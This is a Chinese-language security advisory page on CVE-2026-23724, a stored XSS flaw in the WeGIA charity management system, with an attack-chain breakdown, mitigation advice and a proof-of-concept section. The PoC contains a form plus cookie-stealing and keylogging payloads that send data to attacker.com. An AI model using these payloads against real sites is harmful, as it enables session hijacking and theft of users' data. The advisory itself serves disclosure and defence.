IPBUF安全漏洞报告
English
CVE-2026-23724 CVSS 4.3 中危

CVE-2026-23724 WeGIA 存储型XSS漏洞

披露日期: 2026-01-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-23724
漏洞类型
存储型跨站脚本(XSS)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WeGIA

相关标签

存储型XSSWeGIACVE-2026-23724Web安全跨站脚本慈善机构管理系统会话劫持

漏洞概述

CVE-2026-23724是WeGIA慈善机构Web管理系统中的一个存储型跨站脚本(Stored XSS)安全漏洞。该漏洞存在于html/atendido/cadastro_ocorrencia.php端点中,影响3.6.2之前的所有版本。攻击者可以利用该漏洞在Atendido选择下拉菜单中注入恶意JavaScript代码,由于是存储型XSS,恶意脚本会被永久保存在服务器端,所有访问该页面的用户都会受到攻击。CVSS 3.1评分为4.3,属于中等严重程度,攻击复杂度低且无需特殊权限,攻击者仅需在提交表单时注入XSS payload即可实现持久化攻击。该漏洞由GitHub安全团队发现并报告,已在3.6.2版本中通过输入清理得到修复。

技术细节

该漏洞的根本原因在于WeGIA应用在处理用户提交的数据时,未对Atendido下拉菜单中的数据进行充分的输入验证和输出编码。当用户在html/atendido/cadastro_ocorrencia.php页面提交表单数据时,攻击者可以在Atendido字段中嵌入恶意JavaScript代码(如<script>alert(document.cookie)</script>),该数据会被直接存储到数据库中而未经任何转义或过滤。当其他用户访问包含该下拉菜单的页面时,服务器从数据库读取未经过滤的数据并直接渲染到HTML页面中,导致恶意脚本在用户浏览器中执行。由于是存储型XSS,攻击具有持久性,攻击者无需对每个受害者进行单独攻击。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。修复方案是在数据输出时进行HTML实体编码,或在数据输入时进行严格的输入验证。

攻击链分析

STEP 1
Reconnaissance
攻击者识别目标系统使用的是WeGIA应用,并定位到存在漏洞的端点html/atendido/cadastro_ocorrencia.php
STEP 2
Payload Preparation
攻击者准备恶意XSS payload,如<script>alert(document.cookie)</script>或其他窃取敏感信息的脚本代码
STEP 3
Initial Exploitation
攻击者通过POST请求向cadastro_ocorrencia.php端点提交包含恶意脚本的Atendido字段数据
STEP 4
Persistence
恶意数据被直接存储到数据库中,未经任何输入过滤或转义处理
STEP 5
Trigger
当普通用户访问包含该Atendido下拉菜单的页面时,服务器从数据库读取未过滤的数据并渲染到HTML页面
STEP 6
Execution
用户浏览器执行注入的恶意JavaScript代码,导致会话劫持、敏感信息窃取或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2026-23724 Stored XSS PoC --> <!-- Target: WeGIA html/atendido/cadastro_ocorrencia.php --> <!-- Step 1: Inject malicious JavaScript via Atendido field --> <form action="https://target.com/html/atendido/cadastro_ocorrencia.php" method="POST"> <input type="hidden" name="atendido" value="<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"> <input type="submit" value="Exploit"> </form> <!-- Alternative XSS payloads --> <!-- Basic: <script>alert('XSS')</script> --> <!-- Cookie stealing: <img src=x onerror="this.src='https://attacker.com/?c='+document.cookie"> --> <!-- Keylogger: <body onload="document.addEventListener('keypress',function(e){fetch('https://attacker.com/k?k='+e.key)})"> -->

影响范围

WeGIA < 3.6.2

防御指南

临时缓解措施
立即将WeGIA升级到3.6.2版本以修复该漏洞。如果暂时无法升级,可采取以下临时缓解措施:1) 在Web应用防火墙(WAF)层面配置XSS过滤规则;2) 禁用受影响端点的访问权限;3) 监控日志中的可疑XSS payload特征;4) 提醒用户不要点击来源不明的链接。长期来看,应建立安全开发流程,在代码审查阶段加入输入验证和输出编码检查。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表